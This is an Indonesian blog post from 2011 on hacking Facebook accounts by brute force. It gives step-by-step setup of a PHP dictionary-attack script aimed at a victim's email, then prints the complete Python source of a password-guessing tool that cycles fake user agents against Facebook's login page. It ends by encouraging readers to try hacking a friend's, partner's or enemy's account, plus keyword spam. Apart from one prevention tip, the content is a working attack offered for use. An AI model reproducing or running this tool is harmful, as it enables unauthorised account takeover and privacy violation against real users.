Minggu, 10 April 2011

Cara Hack Akun Facebook Dengan Metode Bruteforce

PERTAMA: Cara hack facebook dengan metode ini adalah cara paling bodoh untuk membobol facebook dan biasanya paling terakhir digunakan, karena membutuhkan waktu yang tidak singkat. metode hacking facebook dengan cara ini adalah dengan menggunakan software bruteforce untuk menebak-nebak password facebook sebuah akun dari sebuah file dictionary / kamus atau juga character generator. cara mencegah hack facebook dengan metode ini adalah dengan melindungi alamat email yang anda gunakan untuk login facebook, caranya bisa bermacam-macam, anda bisa memisah antara email untuk umum dan email untuk login facebook dan tidak menampilkannya di halam profil facebook anda. KEDUA: Postingan tentang hacking facebook ini gue copas aja dari situs jasakom.com : Facebook, ? iya sapa yg tidak kenal dengan situs jejaring sosial ini. Ga punya account tetapi setidaknya pernah dengar nama ini bukan ). Jejaring Sosial ini mungkin salah satu fenomena di beberapa tahun belakangan ini setelah pendahulunya friendster. Nah sebagai situs pertemanan, situs jejaring sosial ini tidak luput dari ke isengan tangan2 jahil, motifnya pun beragam, mulai dari isengin pemiliknya, revenge, sakit hati, dan yg paling parah adalah karena dengan motif buat nyari CHIPS POKER (nah lo, ngaku aja lo pada ) Implementasi Facebook Hacking Dengan Brute Force Berbagai teknik telah banyak beredar di kalangan underground, teknik nya pun beragam, mulai dari teknik phising (fake login ), maupun keylogger hanya dengan tujuan untuk mendapatkan account pribadi targetnya. ok, cukup basa basinya rel…..to the point aja deh sebelumnya kita musti bikin persiapan dolo, ibarat mo perang senjata harus lengkap …. yg musti disiapin sebagai berikut 1. Musti punya server atau hosting (gratis/ bayar) buat upload and nyimpen script 2 berikut. * Facebook BruteForce Script * Simple Dictionary Attack Nah, file itu adalah file utama yg harus disimpan ke dalam hostingan 2. Buat Dictionary Attack bisa qmu bikin tambah dan edit sendiri dari wordlist Dictionary ataw mungkin bisa cari yg lebih lengkap. OK, persiapan telah selesai….saatnya ke medan perang……ga deng, maksudnya kita akan melakukan testing. disini saya asumsikan lo pada udah punya hosting buat tempat naroh file-file tadi. klo ga tau cara bikin hosting silahkan tanya ke google yah ) 1.pada source code Facebook Dictionary attacknya kita edit dolo sebelom di upload set_time_limit(0); kita ubah time limitnya menjadi gede misalnya 500 dan ini dalam hitungan detik hingga code itu menjadi set_time_limit(500); 2. $username =”brute@force.org”; // username korban misalnya target@bego.com hingga pada code menjadi $username =”target@bego.com”; 3. $dictionary =”dictionary.txt”; adalah tempat dictionary attack kita. biasanya diletakkan dalam satu directory Setelah Semuanya di Edit, upload ke Hostingan yg kamu punya, misalkan saya punya Hosting (orang) yg saya pakai untuk contoh ini saya upload ke dalam satu directory bernama fb. Nah setelah kedua file tersebut sukses di upload dalam 1 direktory Facebook HAcking setelah sukses, skr tinggal eksekusi tuh via eb address. misalkan lo nyimpen di direktory /home/xxx.com/images/ maka eksekusi aja di http://xxx.com/images/ jika di eksekusi maka script akan mencoba membruteforce account milik target lo. Bruteforce Target Jika dah selesai , maka log hasil bruteforce tadi akan tersimpan dengan nama cookie.txt. pada direktory yg sama . silahkan di analisa hasilnya…. And last word, thanks for you attention if u read a simple tutorial. KETIGA: FbBruteforce Silakan download FbBruteforce: Berikut Codenya: #!/usr/bin/python # This is facebook bruteforcer tools # This was written for educational purpose and pentest only. Use it at your own risk. # Author will not be responsible for any damage !! # Toolname : facebookbruteforcer.py # Programmer : Gunslinger_ # Version : 1.0 # Date : Tue Jul 27 13:24:44 WIT 2010 # Special thanks to mywisdom to inspire me ;) import re import os import sys import random import warnings import time try: import mechanize except ImportError: print "[*] Please install mechanize python module first" sys.exit(1) except KeyboardInterrupt: print "\n[*] Exiting program...\n" sys.exit(1) try: import cookielib except ImportError: print "[*] Please install cookielib python module first" sys.exit(1) except KeyboardInterrupt: print "\n[*] Exiting program...\n" sys.exit(1) warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning) # define variable __programmer__ = "gunslinger_ " __version__ = "1.0" verbose = False useproxy = False usepassproxy = False log = 'fbbruteforcer.log' file = open(log, "a") success = 'http://www.facebook.com/?sk=messages&ref=mb' fblogin = 'https://login.facebook.com/login.php?login_attempt=1' # some cheating .. ouruseragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)', 'Microsoft Internet Explorer/4.0b1 (Windows 95)', 'Opera/8.00 (Windows NT 5.1; U; en)', 'amaya/9.51 libwww/5.4.0', 'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)', 'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)', 'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]' ] facebook = ''' __ _ _ / _| | | | | | |_ __ _ ___ ___| |__ ___ ___ | | __ | _/ _` |/ __/ _ \ '_ \ / _ \ / _ \| |/ / | || (_| | (_| __/ |_) | (_) | (_) | < |_| \__,_|\___\___|_.__/ \___/ \___/|_|\_\\ bruteforcer... Programmer : %s Version : %s''' % (__programmer__, __version__) option = ''' Usage : %s [options] Option : -u, --username | User for bruteforcing -w, --wordlist | Wordlist used for bruteforcing -v, --verbose | Set %s will be verbose -p, --proxy | Set http proxy will be use -k, --usernameproxy | Set username at proxy will be use -i, --passproxy | Set password at proxy will be use -l, --log | Specify output filename (default : fbbruteforcer.log) -h, --help | Print this help Example : %s -u brad@hackme.com -w wordlist.txt" P.S : add "&" to run in the background ''' % (sys.argv[0], sys.argv[0], sys.argv[0]) hme = ''' Usage : %s [option] -h or --help for get help ''' % sys.argv[0] def helpme(): print facebook print option file.write(facebook) file.write(option) sys.exit(1) def helpmee(): print facebook print hme file.write(facebook) file.write(hme) sys.exit(1) for arg in sys.argv: try: if arg.lower() == '-u' or arg.lower() == '--user': username = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-w' or arg.lower() == '--wordlist': wordlist = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-l' or arg.lower() == '--log': log = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-p' or arg.lower() == '--proxy': useproxy = True proxy = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-k' or arg.lower() == '--userproxy': usepassproxy = True usw = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-i' or arg.lower() == '--passproxy': usepassproxy = True usp = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-v' or arg.lower() == '--verbose': verbose = True elif arg.lower() == '-h' or arg.lower() == '--help': helpme() elif len(sys.argv) <= 1: helpmee() except IOError: helpme() except NameError: helpme() except IndexError: helpme() def bruteforce(word): try: sys.stdout.write("\r[*] Trying %s... " % word) file.write("[*] Trying %s\n" % word) sys.stdout.flush() br.addheaders = [('User-agent', random.choice(ouruseragent))] opensite = br.open(fblogin) br.select_form(nr=0) br.form['email'] = username br.form['pass'] = word br.submit() response = br.response().read() if verbose: print response if success in response: print "\n\n[*] Logging in success..." print "[*] Username : %s" % (username) print "[*] Password : %s\n" % (word) file.write("\n[*] Logging in success...") file.write("\n[*] Username : %s" % (username)) file.write("\n[*] Password : %s\n\n" % (word)) sys.exit(1) except KeyboardInterrupt: print "\n[*] Exiting program...\n" sys.exit(1) except mechanize._mechanize.FormNotFoundError: print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n" file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n") sys.exit(1) except mechanize._form.ControlNotFoundError: print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n" file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n") sys.exit(1) def releaser(): global word for word in words: bruteforce(word.replace("\n","")) def main(): global br global words try: br = mechanize.Browser() cj = cookielib.LWPCookieJar() br.set_cookiejar(cj) br.set_handle_equiv(True) br.set_handle_gzip(True) br.set_handle_redirect(True) br.set_handle_referer(True) br.set_handle_robots(False) br.set_debug_http(False) br.set_debug_redirects(False) br.set_debug_redirects(False) br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) if useproxy: br.set_proxies({"http": proxy}) if usepassproxy: br.add_proxy_password(usw, usp) if verbose: br.set_debug_http(True) br.set_debug_redirects(True) br.set_debug_redirects(True) except KeyboardInterrupt: print "\n[*] Exiting program...\n" file.write("\n[*] Exiting program...\n") sys.exit(1) try: preventstrokes = open(wordlist, "r") words = preventstrokes.readlines() count = 0 while count < len(words): words[count] = words[count].strip() count += 1 except IOError: print "\n[*] Error: Check your wordlist path\n" file.write("\n[*] Error: Check your wordlist path\n") sys.exit(1) except NameError: helpme() except KeyboardInterrupt: print "\n[*] Exiting program...\n" file.write("\n[*] Exiting program...\n") sys.exit(1) try: print facebook print "\n[*] Starting attack at %s" % time.strftime("%X") print "[*] Account for bruteforcing %s" % (username) print "[*] Loaded :",len(words),"words" print "[*] Bruteforcing, please wait..." file.write(facebook) file.write("\n[*] Starting attack at %s" % time.strftime("%X")) file.write("\n[*] Account for bruteforcing %s" % (username)) file.write("\n[*] Loaded : %d words" % int(len(words))) file.write("\n[*] Bruteforcing, please wait...\n") except KeyboardInterrupt: print "\n[*] Exiting program...\n" sys.exit(1) try: releaser() bruteforce(word) except NameError: helpme() if __name__ == '__main__': main() Nah, dari beberapa cara hack facebook dan pencegahannya di atas semoga anda lebih berhati-hati, untuk lebih detail mengenai tiap metode atau cara yang saya sebutkan di atas akan saya bahas di postingan saya yang selanjutnya, semoga bermanfaat dan semoga akun facebook anda tidak kena hack :) Selamat berekperimen untuk mencoba berbagai cara hack facebook, berbagai cara hack fb, berbagai cara hack account facebook, hack facebook teman, hack facebook pacar, hack facebook musuh, hack akun facebook, cara hack facebook, cara ngehack facebook, cara hack password facebook, cara hack account facebook, crack facebook. cara membobol password facebook, cara menjebol password facebook, cara membobol facebook, cara mengetahui account facebook, cara mengetahui password facebook, cara menghack facebook, tutorial hack facebook, tutorial hacking facebook. cara hack facebook, cara hack facebook orang lain, cara hack facebook, cara hack fb, cara hack password facebook, cara hack fb 2011, cara hack facebook orang, cara hack facebook 2011, cara hack fb orang lain, cara hack fb terbaru, cara hack fb 2011, cara hack fb orang, cara hack akun fb, cara hack akun fb orang lain, cara hack akun facebook terbaru, cara hack akun facebook 2011, cara hack password fb, cara hack account fb, cara hack account facebook, cara hack account facebook 2011, cara hack account facebook terbaru, cara hack facebook teman, cara hack facebook pacar, cara hack fb teman, cara hack fb pacar, crack facebook, cara crack fb, cara menjebol fb, cara menjebol akun, fb, cara membobol password facebook, cara menjebol password facebook, cara membobol facebook, cara mengetahui account facebook, cara mengetahui password facebook, cara menghack facebook, tutorial hack facebook, tutorial hacking facebook, tutorial hack fb, tutorial hacking fb, tutorial hacking account fb, tutorial hacking account facebook, tutorial hack account facebook, tutorial hacking password facebook, tutorial hack password facebook, tutorial crack facebook.

Reaksi:

0 komentar:

Posting Komentar

WARNING !
Komentar anda tidak boleh mengandung unsur:
1.Penghinaan, Rasis dan Pelecehan
2.Spamming (Spam Comments)
3.Link Iklan, ads etc
Terima Kasih.


Jika ada request ato laporan tentang :
1.Request Software atau Tutorial
2.Bad Link & Re-active link (akibat broken link)
Silakan comment di bawah atau kirim pesan ke saya via facebook >> Akunku : Adhieresthenes Hier Banu Arfakhshad